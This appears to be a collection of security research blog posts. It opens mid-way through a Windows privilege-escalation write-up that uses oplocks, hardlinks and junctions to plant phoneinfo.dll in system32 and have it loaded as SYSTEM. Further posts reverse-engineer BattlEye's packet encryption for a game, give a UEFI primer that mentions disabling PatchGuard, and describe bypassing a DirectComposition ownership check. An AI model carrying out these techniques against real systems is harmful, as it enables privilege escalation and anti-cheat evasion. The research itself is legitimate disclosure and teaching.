    • %WINDIR%\temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_WPR System Collector.etl is created
  3. Create %WINDIR%\temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrack[0-100].etl as hardlinks to the payload.
  4. Create symbolic links \RPC Control\WPR_initiated_DiagTrack[0-100.]etl targeting %WINDIR%\system32\phoneinfo.dll
  5. Make OPLOCK on WPR_initiated_DiagTrack100.etl; when broken, check if %WINDIR%\system32\phoneinfo.dll exists. If not, repeat creation of WPR_initiated_DiagTrack[].etl files and matching symbolic links.
  6. Make OPLOCK on on WPR_initiated_DiagTrack0.etl; when it is broken, we know that the rename flow has begun but the first rename operation has not happened yet.

Upon breakage:

  1. rename %WINDIR%\temp\DiagTrack_alternativeTrace\extra to %WINDIR%\temp\DiagTrack_alternativeTrace\{RANDOM-GUID}
  2. Create folders %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap
  3. Start thread that in a loop switches %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap between being a mountpoint targeting %WINDIR%\temp\DiagTrack_alternativeTrace\extra and \RPC Control in NT object namespace.
  4. Start snapshot trace with %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap as outputDirectory

Upon execution, 100 files will get renamed. If none of them becomes phoneinfo.dll in system32, it will repeat until success.

I then added a check for the existence of %WINDIR%\system32\phoneinfo.dll in the thread that switches the junction point. The increased delay between switching appeared to increase the chance of one of the renames creating phoneinfo.dll. Testing shows the loop ends by the end of the first 100 iterations.

Upon detection of %WINDIR%\system32\phoneinfo.dll, a blank error report is submitted to Windows Error Reporting service, configured to be submitted out of proc, causing wermgmr.exe to load the just created phoneinfo.dll in SYSTEM security context.

The payload is a DLL that upon DLL_PROCESS_ATTACH will check for SeImpersonatePrivilege and, if enabled, cmd.exe will get spawned on the current active desktop. Without the privileged check, additional command prompts would spawn since phoneinfo.dll is also attempted to be loaded by the process that initiates the error reporting.

In addition, a message is shown using WTSSendMessage so we get an indicator of success even if the command prompt cannot be spawned in the correct session/desktop.

The red color is because my command prompts auto execute echo test> C:\windows:stream && color 4E; that makes all UAC elevated command prompts’ background color RED as an indicator to me.

Though my example on the repository contains private libraries, it may still be beneficial to get a general overview of how it works.

Cracking BattlEye packet encryption

Recently, Battlestate Games, the developers of Escape From Tarkov, hired BattlEye to implement encryption on networked packets so that cheaters can’t capture these packets, parse them and use them for their advantage in the form of radar cheats, or otherwise. Today we’ll go into detail about how we broke their encryption in a few hours.

Analysis of EFT

We started first by analyzing Escape From Tarkov itself. The game uses Unity Engine, which uses C#, an intermediate langauge, which means you can very easily view the source code behind the game by opening it in tools like ILDasm or dnSpy. Our tool of choice for this analysis was dnSpy.

Unity Engine, if not under the IL2CPP option, generates game files and places them under GAME_NAME_Data\Managed, in this case it’s EscapeFromTarkov_Data\Managed. This folder contains all the dependencies that the engine uses, including the file that contains the game’s code which is Assembly-CSharp.dll, we loaded this file in dnSpy then searched for the string encryption, which landed us here:

This segment is in a class called EFT.ChannelCombined, which is the class that handles networking as you can tell by the arguments passed to it:

Right clicking on channelCombined.bool_2, which is the variable they log as an indicator for whether encryption was enabled or not, then clicking Analyze, shows us that it’s referenced by 2 methods:

The second of which is the one we’re currently in, so by double clicking on the first one, it lands on this:

Voila! There’s our call into BEClient.EncryptPacket, when you click on that method it’ll take you to the BEClient class, which we can then dissect and find a method called DecryptServerPacket, this method calls into a function in BEClient_x64.dll called pfnDecryptServerPacket that will decrypt the data into a user-allocated buffer and write the size of the decrypted buffer into a pointer supplied by the caller.

pfnDecryptServerPacket is not exported by BattlEye, nor is it calculated by EFT, it’s actually supplied by BattlEye’s initializer once called by the game. We managed to calculate the RVA (Relative Virtual Address) by loading BattlEye into a process of our own, and replicating how the game initializes it.

The code for this program is available here.

Analysis of BattlEye

As we’ve deduced from the last section, EFT calls into BattlEye to do all its cryptography needs. So now it’s a matter of reversing native code rather than IL, which is significantly harder.

BattlEye uses a protector called VMProtect, which virtualizes and mutates segments specified by the developer. To properly reverse a binary protected by this obfuscator, you’ll need to unpack it.

Unpacking is as simple as dumping the image at runtime; we did this by loading it into a local process then using Scylla to dump it’s memory to disk.

Opening this file in IDA, then going to the DecryptServerPacket routine will lead us to a function that looks like this:

This is what’s called a vmentry, which pushes a vmkey on the stack then calls into a vminit which is the handler for the virtual machine.

Here is the tricky part: the instructions in this function are only understandable by the program itself due to them being “virtualized” by VMProtect.

Luckily for us, fellow Secret Club member can1357 made a tool that completely breaks this protection, which you can find at VTIL.

Figuring the algorithm

The file produced by VTIL reduced the function from 12195 instructions down to 265, which simplified the project massively. Some VMProtect routines were present in the disassembly, but these are easily recognized and can be ignored, the encryption begins from here:

Equivalent in pseudo-C:

uint32_t flag_check = *(uint32_t*)(image_base + 0x4f8ac);

if (flag_check != 0x1b)
	goto 0x20e445;
else
	goto 0x20e52b;

VTIL uses its own instruction set, I translated this to psuedo-C to simplify it further.

We analyze this routine by going into 0x20e445, which is a jump to 0x1a0a4a, at the very start of this function they move sr12 which is a copy of rcx (the first argument on the default x64 calling convention), and store it on the stack at [rsp+0x68], and the xor key at [rsp+0x58].

This routine then jumps to 0x1196fd, which is:

Equivalent in pseudo-C:

uint32_t xor_key_1 = *(uint32_t*)(packet_data + 3) ^ xor_key;
(void(*)(uint8_t*, size_t, uint32_t))(0x3dccb7)(packet_data, packet_len, xor_key_1);

Note that rsi is rcx, and sr47 is a copy of rdx. Since this is x64, they are calling 0x3dccb7 with arguments in this order: (rcx, rdx, r8). Lucky for us vxcallq in VTIL means call into function, pause virtual exectuion then return into virtual machine, so 0x3dccb7 is not a virtualized function!

Going into that function in IDA and pressing F5 will bring up pseudo-code generated by the decompiler:

This code looks incomprehensible with some random inlined assembly that has no meaning at all. Once we nop these instructions out, change some var types, then hit F5 again the code starts to look much better:

This function decrypts the packet in 4-byte blocks non-contiguously starting from the 8th byte using a rolling XOR key.

Once we continue looking at the assembly we figure that it calls into another routine here:

Equivalent in x64 assembly:

mov t225, dword ptr [rsi+0x3]
mov t231, byte ptr [rbx]
add t231, 0xff ; uhoh, overflow

; the following is psuedo
mov [$flags], t231 u< rbx:8

not t231

movsx t230, t231
mov [$flags+6], t230 == 0
mov [$flags+7], t230 < 0

movsx t234, rbx
mov [$flags+11], t234 < 0
mov t236, t234 < 1
mov t235, [$flags+11] != t236

and [$flags+11], t235

mov rdx, sr46 ; sr46=rdx
mov r9, r8

sbb eax, eax ; this will result in the CF (carry flag) being written to EAX

mov r8, t225
mov t244, rax
and t244, 0x11 ; the value of t244 will be determined by the sbb from above, it'll be either -1 or 0 
shr r8, t244 ; if the value of this shift is a 0, that means nothing will happen to the data, otherwise it'll shift it to the right by 0x11

mov rcx, rsi
mov [rsp+0x20], r9
mov [rsp+0x28], [rsp+0x68]

call 0x3dce60

Before we continue dissecting the function it calls, we have to come to the conclusion that the shift is meaningless due to the carry flag not being set, resulting in a 0 return value from the sbb instruction, which means we’re on the wrong path.

If we look for references to the first routine 0x1196fd, we’ll see that it’s actually referenced again, this time with a different key!

That means the first key was actually a red herring, and the second key is most likely the correct one. Nice one Bastian!

Now that we’ve figured out the real xor key and the arguments to 0x3dce60, which are in the order: (rcx, rdx, r8, r9, rsp+0x20, rsp+0x28).

We go to that function in IDA, hit F5 and it’s very readable:

We know the order of the arguments, their type and their meaning, the only thing left is to translate this to actual code, which we’ve done nicely and wrapped into a gist available here.

Synopsis

This encryption wasn’t the hardest to reverse engineer, and our efforts were certainly noticed by BattlEye; after 3 days, the encryption was changed to a TLS-like model, where RSA is used to securely exchange AES keys. This makes MITM without reading process memory by all intents and purposes infeasible.

Introduction to UEFI: Part 1

26 May 2020 at 23:00

Hello, and welcome to our first article on the site! Today we will be diving into UEFI. We are aiming to provide beginners a brief first look at a few topics, including:

  1. What is UEFI?
  2. Why develop UEFI software?
  3. UEFI boot phases
  4. Getting started with developing UEFI software

What is UEFI?

Unified Extensible Firmware Interface (UEFI) is an interface that acts as the “middle-man” between the operating system and the platform firmware during the start-up process of the system. It is the successor to the BIOS and provides us with a modern alternative to the restrictive system that preceded it. The UEFI specification allows for many new features including:

  • Graphical User Interface (GUI) with mouse support
  • Support for GPT drives (including 2TB or greater drives, and more than 4 primary partitions)
  • Faster booting (depending on OS support)
  • Simplified ACPI access for power management features
  • Simplified software development compared to the arcane BIOS

As you can see, there are many compelling reasons for using UEFI over the legacy BIOS nowadays.

Why develop UEFI software?

There are many reasons as to why one would want to develop UEFI software, and today we will be mentioning a few of those reasons to hopefully inspire some of you to attempt to develop or further your knowledge in this subject.

1) Control over the boot process

One very big use case for UEFI is a boot manager such as GRUB. GRUB (GRand Unified Bootloader) is a multi-boot loader that allows a user to select the operating system they wish to boot into, whilst handling the process of selecting which OS or kernel needs to be loaded into memory. It will then transfer control to the respective OS. This is a very helpful tool, and makes use of UEFI to remove the need for manual interaction in the loading of alternative OS’s.

2) Modification of OS kernel initialization

Sometimes one may want to redirect certain OS kernel initialization procedures or even fully prevent them from running. This is not possible to do with a boot-time driver. Why is this the case? Well, a large part of kernel initialization happens before any drivers are loaded, so any modifications will not be possible after this point in the presence of Kernel Patch Protection (PatchGuard). Another reason is the issue of Driver Signature Enforcement (DSE): Microsoft requires that loaded drivers on Windows must be signed with a valid kernel mode signing certificate, unless test signing mode is enabled.

An example of a UEFI project that modifies Windows kernel initialization procedures is EfiGuard. This UEFI driver patches certain parts of the Windows boot loader and kernel at boot time, and can effectively disable PatchGuard and optionally DSE.

3) Develop low level system knowledge

Another reason for developing UEFI software could be to increase your understanding of the system at a low level. Being able to follow the initialization process of the system allows for a much more in-depth look at how operating systems themselves work. Additionally, the ability to build OS independent drivers, as well as work with a sophisticated toolset giving you full control over a system is something that may be of interest to many people.

UEFI boot phases

UEFI has six main boot phases, which are all critical in the initialization process of the platform. The combined phases are referred to as the Platform Initialization or PI. Hopefully the brief descriptions of each stage below will give you a basic understanding of this process. Our series will focus primarily on the DXE and RT phases, as these are probably the two main areas of interest for people getting started with UEFI.

Security (SEC)

This phase is the primary stage of the UEFI boot process, and will generally be used to: initialize a temporary memory store, act as the root of trust in the system and provide information to the Pre-EFI core phase. This root of trust is a mechanism that ensures any code that is executed in the PI is cryptographically validated (digitally signed), creating a “secure boot” environment.

Pre-EFI Initialization (PEI)

This is the second stage of the boot process and involves using only the CPU’s current resources to dispatch Pre-EFI Initialization Modules (PEIMs). These are used to perform initialization of specific boot-critical operations such as memory initialization, whilst also allowing control to pass to the Driver Execution Environment (DXE).

Driver Execution Environment (DXE)

The DXE phase is where the majority of the system initialization occurs. In the PEI stage, the memory required for the DXE to operate is allocated and initialized, and upon control being passed to the DXE, the DXE Dispatcher is then invoked. The dispatcher will perform the loading and execution of hardware drivers, runtime services, and any boot services required for the operating system to start.

Boot Device Selection (BDS)

Upon completion of the DXE Dispatcher executing all DXE drivers, control is passed to the BDS. This stage is responsible for initializing console devices and any remaining devices that are required. The selected boot entry is then loaded and executed in preparation for the Transient System Load (TSL).

Transient System Load (TSL)

In this phase, the PI process is now directly between the boot selection and the expected hand-off to the main operating system phase. Here, an application such as the UEFI shell may be invoked, or (more commonly) a boot loader will run in order to prepare the final OS environment. The boot loader is usually responsible for terminating the UEFI Boot Services via the ExitBootServices() call. However, it is also possible for the OS itself to do this, such as the Linux kernel with CONFIG_EFI_STUB.

Runtime (RT)

The final phase is the runtime one. Here is where the final handoff to the OS occurs. The UEFI compatible OS now takes over the system. The UEFI runtime services remain available for the OS to use, such as for querying and writing variables from NVRAM.

The SMM (System Management Mode) exists separately from the runtime phase and may also be entered during this phase when an SMI is dispatched. We will not be covering the SMM in this introduction.

Getting started with developing UEFI software

In this section we will be providing you with a list of the most essential tools to help you begin your development journey with UEFI. When it comes to the question of “where to begin?”, there aren’t many resources easily accessible, so here is a shortlist of the development tools we recommend:

- EDK2

First and foremost is the EDK2 project, which is described as “a modern, feature-rich, cross-platform firmware development environment for the UEFI and PI specifications from [www.uefi.org.]” The EDK2 project is developed and maintained (together with community volunteers) by many of the same parties that contribute to the UEFI specification.

This is extremely helpful as EDK2 is guaranteed to contain the latest UEFI protocols (assuming you are using the master branch). In addition to this, there are countless high-quality projects for you to use as a guide. One example is the Open Virtual Machine Firmware (OVMF). This is a project that is aimed at providing UEFI support for virtual machines and it is very well documented.

One major downside to EDK2 is the process of setting up the build environment for the first time - it is a long and arduous process, and even with their Getting started with EDK2 guide to make it as simple as possible, it can still be confusing for newcomers.

- VisualUefi

The VisualUefi project is aimed at allowing EDK2 development inside Visual Studio. We would recommend you to begin your development by using the build tools from EDK2 command line over this project, to allow you to become comfortable with the platform.

Furthermore, VisualUefi offers headers and libraries that are a subset of the complete EDK2 libraries, and so you may find that not everything you require is easily accessible. It is, however, much easier to set up in comparison to EDK2, and is therefore often favored by avid Visual Studio users.

- Debugging

In regards to debugging, there are a few options available to you, each with their pros and cons. These will be listed below, and it is up to you which you favor the most. In part 2 of this series we will be showing you how to debug an example driver, so until then you may want to install all of these (or none!) to help you make an informed decision:

  1. QEMU - a multiplatform emulator (though best on Linux) that provides the best debugging facilities due to being an emulator rather than a VM. It is quite complex to set up, and concerning its counterparts, it is also quite slow.
  2. VirtualBox - a good multiplatform solution, with the exception of it suffering from memory loss due to pretty lackluster non-volatile RAM (NVRAM) emulation.
  3. VMware - offers good performance with correctly working NVRAM emulation. If the guest and host are both Windows, it works very well with WinDbg for debugging the TSL and RT phases.

Final words

In this article we have covered a couple of different introductory topics to help you get a basic understanding of what UEFI is. We would expect you to hopefully have some extra questions regarding this topic, and we are more than happy to answer them for you. Part 2 of this series will be more technical, however it will be explained thoroughly to the best of our abilities to make it as simple to follow as possible. We will be providing code for a simple DXE driver built with EDK2, and will show examples of basic console input and output, writing to a serial port, and debugging the driver with QEMU.

Thank you very much for reading this far, and we look forward to continuing this series in the coming weeks!

Abusing DComposition to render on external windows

12 May 2020 at 23:00
By: yousif

In 2012, Microsoft introduced “DirectComposition”, a technology that helps improve performance for bitmap drawings & compositions tremendously, the way it works is that it utilizes the graphics hardware to compose & render objects, which means that it’ll run independently, aside from the main UI thread.

It can therefore be deduced that there must be a layer of interaction, or a method to apply the composition onto the desired window, or target, abusing this layer of interaction is the main target of today’s article.

The layer of interaction that DirectCompositions use, are objects called “targets” & “visuals”, every IDCompositionTarget will be created by a respective API function that depends on a window handle, and every target will depend on a IDCompositionVisual which contains the visual content represented on the screen.

If you think that you can easily just create a window, then compose on-top of another window from a non-owning process, then you’re wrong. This will cause an error, and the composition won’t be created.

Reversal

Opening up win32kfull, which is the kernel-mode component for DWM, GDI & other windows features then searching for “DComposition” will yield multiple results:

The one we’re interested in is NtUserCreateDCompositionHwndTarget, according to it’s prototype: __int64 (HWND a1, int a2, _QWORD *a3), we can induce that this is simply just IDCompositionDevice::CreateTargetForHwnd, and the parameters are: (HWND hwnd, BOOL topmost, IDCompositionTarget** target).

At the very start of this function there’s a test that checks whether you can create a target for this composition or not:

last_status = TestWindowForCompositionTarget(window_handle, top_most);

This is a simplified form of that function:

NTSTATUS TestWindowForCompositionTarget(HWND window_handle, BOOL top_most)
{	
	tagWND* window_instance = ValidateHwnd(window_handle);
	
	if (!window_instance 
		|| !window_instance->thread_info)
		return STATUS_INVALID_PARAMETER;
		
	// some checks here to verify that DCompositions are supported, and available
	
	PEPROCESS calling_process = IoGetCurrentProcess();
	PEPROCESS owning_process = PsGetThreadProcess(window_instance->thread_info->owning_thread); // tagWnd*->tagTHREADINFO*->KTHREAD*
	
	if (calling_process != owning_process)
		return STATUS_ACCESS_DENIED;
	
	CHwndTargetProp target_properties{};
	
	if (CWindowProp::GetProp<CHwndTargetProp>(window_instance, &target_properties))
	{
		bool unk_error = false;
		
		if (top_most)
			unk_error = !(target_properties.top_most_handle == nullptr);
		else
			unk_error = !(target_properties.active_bg_handle == nullptr);
		
		if (unk_error)
			return (NTSTATUS)0x803e0006; // unique error code, i don't know what it's supposed to resemble
	}
	
	return STATUS_SUCCESS;
}

The check causing failures is if (calling_process != owning_process), this compares the caller’s process to the window’s owner process, and if this check fails they return a STATUS_ACCESS_DENIED error.

They retrieve the window’s owner process by calling ValidateHwnd, which is a function used everywhere in win32k:

This function will return a pointer to a struct of type tagWND, then access a member of type tagTHREADINFO at +0x10 (window_instance->thread_info), then access the actual thread pointer at +0x0 (thread_info->owning_thread).

One way to circumvent these checks is to swap the owning thread of the process’ window to our window temporarily, compose our target on it then swap it back very quickly, which is what the PoC is based on.

Proof Of Concept

I’ve made a PoC, that’ll hijack a window by it’s class name, then render a rectangle at it’s center. you can access the code here.

❌